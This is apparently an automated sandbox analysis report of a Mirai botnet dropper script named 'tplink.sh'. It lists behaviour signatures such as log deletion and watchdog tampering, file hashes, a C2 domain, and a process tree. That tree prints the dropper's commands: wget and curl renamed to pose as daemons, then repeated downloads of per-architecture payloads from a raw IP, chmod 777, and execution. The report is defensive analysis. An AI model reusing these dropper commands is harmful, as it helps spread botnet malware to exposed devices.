Analysis

  • max time kernel
    149s
  • max time network
    151s
  • platform
    debian-9_mipsel
  • resource
    debian9-mipsel-20240611-en
  • resource tags

    arch:mipsel
    image:debian9-mipsel-20240611-en
    kernel:4.9.0-13-4kc-malta
    locale:en-us
    os:debian-9-mipsel
    system
  • submitted
    21/08/2024, 17:47

General

  • Target

    tplink.sh

  • Size

    827B

  • MD5

    503a6790064c0d8afb7220d7ff4d559d

  • SHA1

    c00a805062e7a6274dde96063d42065ba2286085

  • SHA256

    f495ac84e4181503f0e6e4e21728a0cb82c7e9a3f6e1e54741f6eaf589aea82e

  • SHA512

    6c7ab7e8cf0b5b07b1c9cae94e4631e3fab493366d80d9946ba75a11897d8dfe658dcd96fd26d04c3b85a87786aa0656293e331a2b436b018547634c0dd45e37

Score
10/10

Malware Config

Extracted

Family

mirai

C2

really.idoingitagain.space

Signatures

  • Mirai

    Mirai is a prevalent Linux malware infecting exposed network devices.

  • Deletes Audit logs (1 TTP, 1 IoC)

    Deletes logs related to the Linux Audit framework.

  • Deletes system logs (1 TTP, 1 IoC)

    Deletes the log file that contains global system messages. Adversaries may delete system logs to minimize their footprint.

  • Executes dropped EXE (23 IoCs)
  • Modifies Watchdog functionality (1 TTP, 2 IoCs)

    Malware like Mirai modifies the Watchdog to prevent it from restarting an infected system.

  • Deletes log files (1 TTP, 1 IoC)

    Deletes log files on the system.

  • Enumerates running processes

    Discovers information about currently running processes on the system.

  • Changes its process name (1 IoC)
  • Reads CPU attributes (1 TTP, 18 IoCs)
  • Reads runtime system information (64 IoCs)

    Reads data from the /proc virtual filesystem.

  • Writes file to tmp directory (13 IoCs)

    Malware often drops required files in the /tmp directory.

Processes

  • /tmp/tplink.sh
    /tmp/tplink.sh
    1⤵
      PID:703
      • /bin/cp
        cp -p /usr/bin/pkill httpd
        2⤵
        • Writes file to tmp directory
        PID:706
      • /bin/cp
        cp -p /usr/bin/wget sshd
        2⤵
        • Writes file to tmp directory
        PID:713
      • /bin/cp
        cp -p /usr/bin/curl telnetd
        2⤵
        • Writes file to tmp directory
        PID:716
      • /bin/chmod
        chmod +x httpd
        2⤵
          PID:718
        • /bin/chmod
          chmod 777 httpd
          2⤵
            PID:720
          • /bin/chmod
            chmod +x sshd
            2⤵
              PID:722
            • /bin/chmod
              chmod 777 sshd
              2⤵
                PID:724
              • /bin/chmod
                chmod +x telnetd
                2⤵
                  PID:726
                • /bin/chmod
                  chmod 777 telnetd
                  2⤵
                    PID:728
                  • /usr/bin/pkill
                    pkill -f bot.x86
                    2⤵
                    • Reads CPU attributes
                    • Reads runtime system information
                    PID:731
                  • /tmp/httpd
                    ./httpd -f bot.x86
                    2⤵
                    • Executes dropped EXE
                    • Reads CPU attributes
                    • Reads runtime system information
                    PID:734
                  • /usr/bin/pkill
                    pkill -f bot.arm4
                    2⤵
                    • Reads CPU attributes
                    • Reads runtime system information
                    PID:735
                  • /tmp/httpd
                    ./httpd -f bot.arm4
                    2⤵
                    • Executes dropped EXE
                    • Reads CPU attributes
                    • Reads runtime system information
                    PID:737
                  • /usr/bin/pkill
                    pkill -f bot.arm5
                    2⤵
                    • Reads CPU attributes
                    • Reads runtime system information
                    PID:739
                  • /tmp/httpd
                    ./httpd -f bot.arm5
                    2⤵
                    • Executes dropped EXE
                    • Reads CPU attributes
                    • Reads runtime system information
                    PID:741
                  • /usr/bin/pkill
                    pkill -f bot.arm6
                    2⤵
                    • Reads CPU attributes
                    PID:744
                  • /tmp/httpd
                    ./httpd -f bot.arm6
                    2⤵
                    • Executes dropped EXE
                    • Reads CPU attributes
                    • Reads runtime system information
                    PID:746
                  • /usr/bin/pkill
                    pkill -f bot.arm7
                    2⤵
                    • Reads CPU attributes
                    • Reads runtime system information
                    PID:747
                  • /tmp/httpd
                    ./httpd -f bot.arm7
                    2⤵
                    • Executes dropped EXE
                    • Reads CPU attributes
                    • Reads runtime system information
                    PID:748
                  • /usr/bin/pkill
                    pkill -f x86
                    2⤵
                    • Reads CPU attributes
                    • Reads runtime system information
                    PID:749
                  • /tmp/httpd
                    ./httpd -f x86
                    2⤵
                    • Executes dropped EXE
                    • Reads CPU attributes
                    • Reads runtime system information
                    PID:751
                  • /usr/bin/pkill
                    pkill -f arm5
                    2⤵
                    • Reads CPU attributes
                    • Reads runtime system information
                    PID:752
                  • /tmp/httpd
                    ./httpd -f arm5
                    2⤵
                    • Executes dropped EXE
                    • Reads CPU attributes
                    • Reads runtime system information
                    PID:753
                  • /usr/bin/pkill
                    pkill -f arm6
                    2⤵
                    • Reads CPU attributes
                    • Reads runtime system information
                    PID:754
                  • /tmp/httpd
                    ./httpd -f arm6
                    2⤵
                    • Executes dropped EXE
                    • Reads CPU attributes
                    • Reads runtime system information
                    PID:755
                  • /usr/bin/pkill
                    pkill -f arm7
                    2⤵
                    • Reads CPU attributes
                    • Reads runtime system information
                    PID:756
                  • /tmp/httpd
                    ./httpd -f arm7
                    2⤵
                    • Executes dropped EXE
                    • Reads CPU attributes
                    • Reads runtime system information
                    PID:757
                  • /tmp/sshd
                    ./sshd http://45.66.231.129/xd_/cyber-x86
                    2⤵
                    • Executes dropped EXE
                    • Writes file to tmp directory
                    PID:758
                  • /bin/chmod
                    chmod 777 cyber-x86
                    2⤵
                      PID:759
                    • /bin/chmod
                      chmod +x cyber-x86 httpd sshd systemd-private-1cbd810d56a34121887076f16a0fecb0-systemd-timedated.service-DPaW7j telnetd tplink.sh
                      2⤵
                        PID:760
                      • /tmp/cyber-x86
                        ./cyber-x86 tplink-x86
                        2⤵
                        • Executes dropped EXE
                        PID:761
                      • /tmp/sshd
                        ./sshd http://45.66.231.129/xd_/cyber-sh4
                        2⤵
                        • Executes dropped EXE
                        • Writes file to tmp directory
                        PID:763
                      • /bin/chmod
                        chmod 777 cyber-sh4
                        2⤵
                          PID:764
                        • /bin/chmod
                          chmod +x cyber-sh4 cyber-x86 httpd sshd systemd-private-1cbd810d56a34121887076f16a0fecb0-systemd-timedated.service-DPaW7j telnetd tplink.sh
                          2⤵
                            PID:765
                          • /tmp/cyber-sh4
                            ./cyber-sh4 tplink-sh4
                            2⤵
                            • Executes dropped EXE
                            PID:766
                          • /tmp/sshd
                            ./sshd http://45.66.231.129/xd_/cyber-ppc
                            2⤵
                            • Executes dropped EXE
                            • Writes file to tmp directory
                            PID:768
                          • /bin/chmod
                            chmod 777 cyber-ppc
                            2⤵
                              PID:769
                            • /bin/chmod
                              chmod +x cyber-ppc cyber-sh4 cyber-x86 httpd sshd systemd-private-1cbd810d56a34121887076f16a0fecb0-systemd-timedated.service-DPaW7j telnetd tplink.sh
                              2⤵
                                PID:770
                              • /tmp/cyber-ppc
                                ./cyber-ppc tplink-ppc
                                2⤵
                                • Executes dropped EXE
                                PID:771
                              • /tmp/sshd
                                ./sshd http://45.66.231.129/xd_/cyber-mpsl
                                2⤵
                                • Executes dropped EXE
                                • Writes file to tmp directory
                                PID:773
                              • /bin/chmod
                                chmod 777 cyber-mpsl
                                2⤵
                                  PID:774
                                • /bin/chmod
                                  chmod +x cyber-mpsl cyber-ppc cyber-sh4 cyber-x86 httpd sshd systemd-private-1cbd810d56a34121887076f16a0fecb0-systemd-timedated.service-DPaW7j telnetd tplink.sh
                                  2⤵
                                    PID:775
                                  • /tmp/cyber-mpsl
                                    ./cyber-mpsl tplink-mpsl
                                    2⤵
                                    • Deletes Audit logs
                                    • Deletes system logs
                                    • Executes dropped EXE
                                    • Modifies Watchdog functionality
                                    • Deletes log files
                                    • Changes its process name
                                    PID:776
                                  • /tmp/sshd
                                    ./sshd http://45.66.231.129/xd_/cyber-mips
                                    2⤵
                                    • Executes dropped EXE
                                    • Writes file to tmp directory
                                    PID:778
                                  • /bin/chmod
                                    chmod 777 cyber-mips
                                    2⤵
                                      PID:780
                                    • /bin/chmod
                                      chmod +x cyber-mips
                                      2⤵
                                        PID:781
                                      • /bin/chmod
                                        chmod +x cyber-mpsl cyber-ppc cyber-sh4 cyber-x86 httpd sshd systemd-private-1cbd810d56a34121887076f16a0fecb0-systemd-timedated.service-DPaW7j telnetd tplink.sh
                                        2⤵
                                          PID:783
                                        • /tmp/cyber-mips
                                          ./cyber-mips tplink-mips
                                          2⤵
                                            PID:784
                                          • /tmp/sshd
                                            ./sshd http://45.66.231.129/xd_/cyber-m68k
                                            2⤵
                                            • Executes dropped EXE
                                            • Writes file to tmp directory
                                            PID:786
                                          • /bin/chmod
                                            chmod 777 cyber-m68k
                                            2⤵
                                              PID:791
                                            • /bin/chmod
                                              chmod +x cyber-m68k
                                              2⤵
                                                PID:793
                                              • /bin/chmod
                                                chmod +x cyber-mpsl cyber-ppc cyber-sh4 cyber-x86 httpd sshd systemd-private-1cbd810d56a34121887076f16a0fecb0-systemd-timedated.service-DPaW7j telnetd tplink.sh
                                                2⤵
                                                  PID:795
                                                • /tmp/cyber-m68k
                                                  ./cyber-m68k tplink-m68k
                                                  2⤵
                                                    PID:796
                                                  • /tmp/sshd
                                                    ./sshd http://45.66.231.129/xd_/cyber-arm7
                                                    2⤵
                                                    • Executes dropped EXE
                                                    • Writes file to tmp directory
                                                    PID:798
                                                  • /bin/chmod
                                                    chmod 777 cyber-arm7
                                                    2⤵
                                                      PID:806
                                                    • /bin/chmod
                                                      chmod +x cyber-arm7
                                                      2⤵
                                                        PID:808
                                                      • /bin/chmod
                                                        chmod +x cyber-mpsl cyber-ppc cyber-sh4 cyber-x86 httpd sshd systemd-private-1cbd810d56a34121887076f16a0fecb0-systemd-timedated.service-DPaW7j telnetd tplink.sh
                                                        2⤵
                                                          PID:810
                                                        • /tmp/cyber-arm7
                                                          ./cyber-arm7 tplink-arm7
                                                          2⤵
                                                            PID:811
                                                          • /tmp/sshd
                                                            ./sshd http://45.66.231.129/xd_/cyber-arm6
                                                            2⤵
                                                            • Executes dropped EXE
                                                            • Writes file to tmp directory
                                                            PID:813
                                                          • /bin/chmod
                                                            chmod 777 cyber-arm6
                                                            2⤵
                                                              PID:827
                                                            • /bin/chmod
                                                              chmod +x cyber-arm6
                                                              2⤵
                                                                PID:829
                                                              • /bin/chmod
                                                                chmod +x cyber-mpsl cyber-ppc cyber-sh4 cyber-x86 httpd sshd systemd-private-1cbd810d56a34121887076f16a0fecb0-systemd-timedated.service-DPaW7j telnetd tplink.sh
                                                                2⤵
                                                                  PID:831
                                                                • /tmp/cyber-arm6
                                                                  ./cyber-arm6 tplink-arm6
                                                                  2⤵
                                                                    PID:832
                                                                  • /tmp/sshd
                                                                    ./sshd http://45.66.231.129/xd_/cyber-arm5
                                                                    2⤵
                                                                    • Executes dropped EXE
                                                                    • Writes file to tmp directory
                                                                    PID:834
                                                                  • /bin/chmod
                                                                    chmod 777 cyber-arm5
                                                                    2⤵
                                                                      PID:845
                                                                    • /bin/chmod
                                                                      chmod +x cyber-arm5
                                                                      2⤵
                                                                        PID:846
                                                                      • /bin/chmod
                                                                        chmod +x cyber-mpsl cyber-ppc cyber-sh4 cyber-x86 httpd sshd systemd-private-1cbd810d56a34121887076f16a0fecb0-systemd-timedated.service-DPaW7j telnetd tplink.sh
                                                                        2⤵
                                                                          PID:847
                                                                        • /tmp/cyber-arm5
                                                                          ./cyber-arm5 tplink-arm5
                                                                          2⤵
                                                                            PID:848
                                                                          • /tmp/sshd
                                                                            ./sshd http://45.66.231.129/xd_/cyber-arm4
                                                                            2⤵
                                                                            • Executes dropped EXE
                                                                            • Writes file to tmp directory
                                                                            PID:849
                                                                          • /bin/chmod
                                                                            chmod 777 cyber-arm4
                                                                            2⤵
                                                                              PID:850
                                                                            • /bin/chmod
                                                                              chmod +x cyber-arm4
                                                                              2⤵
                                                                                PID:851
                                                                              • /bin/chmod
                                                                                chmod +x cyber-mpsl cyber-ppc cyber-sh4 cyber-x86 httpd sshd systemd-private-1cbd810d56a34121887076f16a0fecb0-systemd-timedated.service-DPaW7j telnetd tplink.sh
                                                                                2⤵
                                                                                  PID:852
                                                                                • /tmp/cyber-arm4
                                                                                  ./cyber-arm4 tplink-arm4
                                                                                  2⤵
                                                                                    PID:853

Downloads

  • /tmp/cyber-mpsl
    Filesize 97KB
    MD5 605c719579681c44f640587ff4dc6db2
    SHA1 b2d17a8d7dd094a6c2d87f993e130383e94e16de
    SHA256 34e3196effc44c3fea00cd70a38c3d4ba747255911b6be2a2c9ef09a47168c47
    SHA512 cb9ff093b9061180d9f6294e80560000fd7fd36b54521ddf5763dc10a399deeaeb0aa0461807b2034562280f8d98a44f41cb7e4368c5ac78a1d8390345840ac7

  • /tmp/cyber-ppc
    Filesize 65KB
    MD5 cc543d4df9e33766e382e50ebfdad980
    SHA1 8a46b3f78f375cf06b9610be58fafe89c61969b2
    SHA256 40bcd636db4a86441b44b9c20ce3d759ddef4a18c168945b53df951edf0b3d42
    SHA512 38ed37e68e99dbb8658dd1f3823e27baef01206b40ec5d0a6a71fd21ff173566b81666a593c8e3a1ccb8c7851bf74bdd11339410200e0508ce69d5ac39352d08

  • /tmp/cyber-sh4
    Filesize 51KB
    MD5 666096845b3b27722b9d9629ddff12c1
    SHA1 0bed897edd6422c3cfb24b0db44a2c87227e4e6e
    SHA256 dd38e661acad7a79affb7b8b0abe2eb634bfd04c338afd5f7bd93a34aa16dd31
    SHA512 229c4c1dda0224b90d6c827c2d63c6a3d90453e5358e38ffaa06c9f3f49d4cfd6e2464a86d69b9a6b06350b003d95a5d7c0312329bb1a51eb9956c12b8052789

  • /tmp/cyber-x86
    Filesize 61KB
    MD5 3d574d6a4916704b337d76226d205abd
    SHA1 80021cc1fc609bde17db484e58dece6a247ee11d
    SHA256 df0f2131b26054328c7ae7428b6cc4d05967dfd334126a99d26660335c02eb0d
    SHA512 e5a843ba13eeb9d83fd0a5b3d34cecfa449e6f9ba77cea1b8867b0fbf91c2d4bbc14f6e8cd27b5550622781b8b29ae0ac952c4ab4e7e4eb5f174a1fd2e24d5a9

  • /tmp/httpd
    Filesize 26KB
    MD5 9b2e60147827c26862e347e58ea9b56b
    SHA1 d02b7acc6394f740de96cab4acf1fe7734b61611
    SHA256 d0a4ab23b044294d3eaa335869195250eeae676a9a434cd68ec9cc4f4c80bfe2
    SHA512 5ab5932a3e9ac6695637aa4f0e68fa85b8fca74bdac3fb17a6e8b1af0d7032030741fc640e49b005bc06c2ffda74feb1fe67709f660672951b0ea54ac98381d0

  • /tmp/sshd
    Filesize 536KB
    MD5 4a7c9f69532775b790e8d999f73a68b9
    SHA1 9cf4d3d57284103e828dcaa514bfa76e84366472
    SHA256 ba3dee31b794d6e0e2df228a87f54f3432100a4acfee8f1a7a64d2584cd80495
    SHA512 925d73442f8a824ac2c016d1ce12293b30ced91cc3954ef74dbd604fc7b4a6c60227c82c52e5491ec3ba8d20a2a8d3b3b6739ef64cc242b9335a756f6631b128

  • /tmp/telnetd
    Filesize 186KB
    MD5 7bca13eb125880aa2615ae9f836ac7fd
    SHA1 884a53c9f84f5b57735da52e2672aa46e282567a
    SHA256 e3c97425e53915f35f1e8315b39d827714c81142a8e6899b7d45cefa9a31f6af
    SHA512 45dc3f8d7ef327785ded043dfe981c9d4eb1faabc1362ad634e3c7795f0f925a9c9b2842d1f8cc19bc125c0d71b42365cb2ad669d2543d2b9bcad6b3c782d1c4